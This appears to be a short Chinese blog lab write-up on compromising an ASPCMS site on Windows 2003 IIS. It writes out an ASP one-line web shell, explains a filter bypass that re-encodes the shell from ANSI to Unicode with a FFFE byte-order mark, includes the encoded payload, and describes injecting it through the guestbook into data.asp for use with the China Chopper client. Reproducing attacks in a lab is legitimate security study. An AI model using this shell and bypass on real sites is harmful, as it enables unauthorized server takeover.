windows2003环境搭建,可参考上一篇WEB攻防-ASP安全-MDB下载-CSDN博客
将aspcms解压到C:\inetpub\wwwroot,创建网站并赋予internet来宾用户权限
配置启用父路径和主页指向
上一篇文章提到,数据库文件后缀为asp、asa会被执行解析,所以当进行访问时,会直接以asp的形式进行执行
根据这个思路,尝试去插入一句话木马
提交后文本被过滤了,所以菜刀无法连接,需要使用其他方法绕过过滤
这里使用ANSI转Unicode的方法
参考文献:ANSI与Unicode互转 - ANSI编码的一句话以Unicode方式显示-CSDN博客
创建一个文本文件,输入一句话木马<% execute request("aaa")%>b,然后另存为ANSI编码
使用winhex打开刚创建的文本文件,将光标定位到首位,选择编辑-->粘贴0字节,添加2个字节
将添加的两个字节改为FFFE, 保存再打开该文件,就完成了转码
┼攠數畣整爠煥敵瑳∨慡≡┩戾
将转码后的乱发写入到留言里
成功插入数据到data.asp中
由于是复现,我们直接查看data.asp
记事本打开data.asp可以直接看到插入的木马
根据asp被执行的特性,就可以使用菜刀执行连接了
